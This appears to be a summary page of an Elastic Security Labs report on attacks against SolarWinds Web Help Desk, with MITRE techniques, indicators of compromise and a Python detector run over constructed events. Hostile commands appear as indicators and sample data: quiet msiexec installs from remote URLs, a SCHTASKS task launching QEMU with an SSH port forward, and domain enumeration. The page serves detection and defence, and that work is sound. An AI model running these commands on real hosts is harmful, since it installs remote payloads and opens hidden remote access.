SolarWinds Web Help Desk Exploitation – February 2026 — Elastic Security Labs

Microsoft and others reported exploitation of Internet-facing SolarWinds Web Help Desk servers that enabled multi-stage intrusions beginning in December 2025, involving remote MSI installations, abuse of RMM tooling, and credential dumping. Elastic and Microsoft observed use of legitimate tools (Velociraptor, Cloudflared, QEMU) for persistence and tunneling, and Elastic published detection and prevention rules covering the activity. #SolarWindsWHD #Velociraptor

Keypoints

  • Microsoft reported exploitation of SolarWinds Web Help Desk (WHD) servers that led to multi-stage intrusions first observed in December 2025 and publicly reported on February 6, 2026.
  • The activity may be linked to one of several WHD vulnerabilities: CVE-2025-26399, CVE-2025-40536, or CVE-2025-40551, affecting multiple WHD versions.
  • Adversaries used living-off-the-land techniques and installed remotely hosted MSI packages (msiexec pointed at an http(s) URL) to deploy RMM agents and legitimate tools (Velociraptor, Cloudflared) for post-compromise execution and tunneling.
  • Operators performed discovery and credential access actions including Active Directory enumeration, DCSync, and extraction of the NTDS.dit database, and they disabled security controls like Defender and the Windows Firewall.
  • Persistence was maintained by creating a scheduled task (TPMProfiler) that launched QEMU at system startup with a user-mode network port forward (hostfwd=tcp::22022-:22, which maps host TCP port 22022 to port 22 inside the guest) to provide SSH-based remote access, and by leveraging RMM functionality for continued access.
  • Elastic Security and Elastic Defend provide multiple prebuilt detections and prevention rules for suspicious WHD child processes, remote MSI installations, scheduled-task QEMU execution, tunneling activity, and credential dumping; Elastic has not observed telemetry of this activity in its datasets as of publication.
  • Recommended actions include applying WHD patches, rotating associated credentials, reviewing impacted hosts for unauthorized activity, and removing or tightly monitoring RMM usage.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – WHD servers were exploited to gain initial access. (‘exploitation of SolarWinds Web Help Desk (WHD)’)
  • [T1059.001 ] PowerShell – Adversaries executed commands and scripts using native interpreters observed as child processes (cmd.exe, powershell.exe, rundll32.exe) spawned from the WHD Java process. (rule excerpt: `process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and process.parent.executable : ("C:\Program Files\WebHelpDesk\*\java*.exe", "C:\Program Files (x86)\WebHelpDesk\*\java*.exe")`)
  • [T1572 ] Protocol Tunneling – Attackers established tunneled remote access (Cloudflared, QEMU) and forwarded SSH/remote ports to maintain sessions. (`SCHTASKS … /TR "C:\Users\tmp\qemu-system-x86_64.exe … -netdev user,id=net0,hostfwd=tcp::22022-:22"`)
  • [T1003.003 / T1003.006 ] OS Credential Dumping: NTDS and DCSync – Active Directory credential theft was observed, including DCSync replication requests and extraction of the NTDS.dit database. ('credential dumping of the Active Directory Domain Database (ntds.dit)')
  • [T1053.005 ] Scheduled Task/Job – Persistence achieved by creating a scheduled task (TPMProfiler) that launches QEMU at system startup. (`SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\tmp\qemu-system-x86_64.exe …"`)

Indicators of Compromise

  • [Domain/URL ] Remote-hosted MSI installers used for initial deployment – hxxps://files.catbox[.]moe/tmp9fc.msi, hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/…/v4.msi and other hosted MSI URLs (e.g., cloudflared release URL).
  • [File name ] Tools and payloads observed on disk – qemu-system-x86_64.exe, cloudflared-windows-amd64.msi (also referenced: Velociraptor MSI, vault.db, NTDS.dit).
  • [Scheduled Task ] Persistence artifact – TPMProfiler scheduled task created with SCHTASKS to launch QEMU at system startup (command includes hostfwd tcp::22022-:22).
  • [Command-line ] Notable command-line activity used for installation and discovery – `msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi`, `msiexec /q /i hxxps://…/v4.msi`, and `net group "domain computers" /do`.
  • [CVE ] Vulnerabilities referenced as potential initial vectors – CVE-2025-26399, CVE-2025-40536 (and CVE-2025-40551 referenced in reporting).
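
The three behaviours above that Elastic's rules key on (a shell spawned by the WHD Java process, msiexec installing from a URL, and a scheduled task launching QEMU with a hostfwd port forward) can be re-implemented as simple matchers and run over process-creation events. The following is an added example written for this page, not Elastic's rule code or Microsoft's telemetry: the events are constructed, the field names follow the ECS keys used in the rule excerpt, and the `C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe` parent path is an assumed install location chosen to fit the page's `WebHelpDesk\*\java*.exe` pattern.

```python
"""Toy re-implementation of three detections described on the page, run over
constructed Windows process-creation events keyed with ECS field names."""
import fnmatch
import re
from typing import Dict, List, Optional

# Constructed sample events, not real telemetry. Paths and URLs mirror the
# page's IOCs; the WHD java.exe location is an assumption for the example.
EVENTS: List[Dict[str, str]] = [
    {   # WHD Java process spawning cmd.exe running AD discovery: should alert
        "process.name": "cmd.exe",
        "process.parent.executable": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
        "process.command_line": 'cmd.exe /c "net group "domain computers" /do"',
    },
    {   # msiexec quietly installing a package fetched over HTTPS: should alert
        "process.name": "msiexec.exe",
        "process.parent.executable": r"C:\Windows\System32\cmd.exe",
        "process.command_line": "msiexec /q /i https://files.catbox.moe/tmp9fc.msi",
    },
    {   # schtasks creating the TPMProfiler task that starts QEMU with a port forward
        "process.name": "schtasks.exe",
        "process.parent.executable": r"C:\Windows\System32\cmd.exe",
        "process.command_line": (
            'SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" '
            r'/TR "C:\Users\tmp\qemu-system-x86_64.exe -netdev user,id=net0,hostfwd=tcp::22022-:22"'
        ),
    },
    {   # Benign: the WHD Java process spawning a non-shell child
        "process.name": "conhost.exe",
        "process.parent.executable": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
        "process.command_line": "conhost.exe",
    },
    {   # Benign: msiexec installing from a local file path
        "process.name": "msiexec.exe",
        "process.parent.executable": r"C:\Windows\explorer.exe",
        "process.command_line": r"msiexec /i C:\Users\admin\Downloads\7zip.msi",
    },
]

# Parent-path globs from the page's rule excerpt, lower-cased because Windows
# paths are case-insensitive; fnmatch's '*' spans backslashes, so any depth matches.
WHD_JAVA_PARENTS = [
    r"c:\program files\webhelpdesk\*\java*.exe",
    r"c:\program files (x86)\webhelpdesk\*\java*.exe",
]
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe"}

# msiexec with an install (/i) argument that is an http(s) URL instead of a file.
REMOTE_MSI = re.compile(r"\bmsiexec(?:\.exe)?\b.*?\s/i\s+https?://\S+", re.IGNORECASE)

# schtasks /create whose task action is a QEMU system binary; the hostfwd option
# has the form tcp:<hostaddr>:<hostport>-<guestaddr>:<guestport>.
QEMU_TASK = re.compile(r"\bschtasks\b.*?/create\b.*?qemu-system\S*", re.IGNORECASE)
HOSTFWD = re.compile(r"hostfwd=tcp:[^:,]*:(\d+)-[^:,]*:(\d+)", re.IGNORECASE)


def whd_suspicious_child(ev: Dict[str, str]) -> bool:
    """True when a shell/LOLBin child is spawned by the WHD Java process."""
    name = ev.get("process.name", "").lower()
    parent = ev.get("process.parent.executable", "").lower()
    return name in SHELL_CHILDREN and any(
        fnmatch.fnmatchcase(parent, pat) for pat in WHD_JAVA_PARENTS)


def remote_msi_install(ev: Dict[str, str]) -> bool:
    """True when msiexec is asked to install a package addressed by URL."""
    return bool(REMOTE_MSI.search(ev.get("process.command_line", "")))


def qemu_scheduled_task(ev: Dict[str, str]) -> Optional[str]:
    """Return 'hostport->guestport' for a QEMU scheduled-task creation, else None."""
    cmdline = ev.get("process.command_line", "")
    if not QEMU_TASK.search(cmdline):
        return None
    fwd = HOSTFWD.search(cmdline)
    return f"{fwd.group(1)}->{fwd.group(2)}" if fwd else "no-hostfwd"


def run_detections(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Evaluate every event against the three matchers and collect alerts in order."""
    alerts: List[Dict[str, str]] = []
    for ev in events:
        cl = ev.get("process.command_line", "")
        if whd_suspicious_child(ev):
            alerts.append({"rule": "whd_suspicious_child", "command_line": cl})
        if remote_msi_install(ev):
            alerts.append({"rule": "remote_msi_install", "command_line": cl})
        fwd = qemu_scheduled_task(ev)
        if fwd is not None:
            alerts.append({"rule": "qemu_scheduled_task", "command_line": cl, "hostfwd": fwd})
    return alerts


if __name__ == "__main__":
    for alert in run_detections(EVENTS):
        print(alert["rule"], "|", alert.get("hostfwd", ""), "|", alert["command_line"][:80])
```

The two benign events show why each matcher needs both halves of its condition: a WHD child process alone is normal (the service spawns helpers), and msiexec alone is normal; it is the shell child of the Java parent, and the URL-sourced package, that the page's rules single out. The hostfwd parser is there because the forwarded host port (22022 here) is what a responder would look for in netstat output and firewall logs on the affected host.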


Read more: https://www.elastic.co/security-labs/solarwinds-whd-exploitation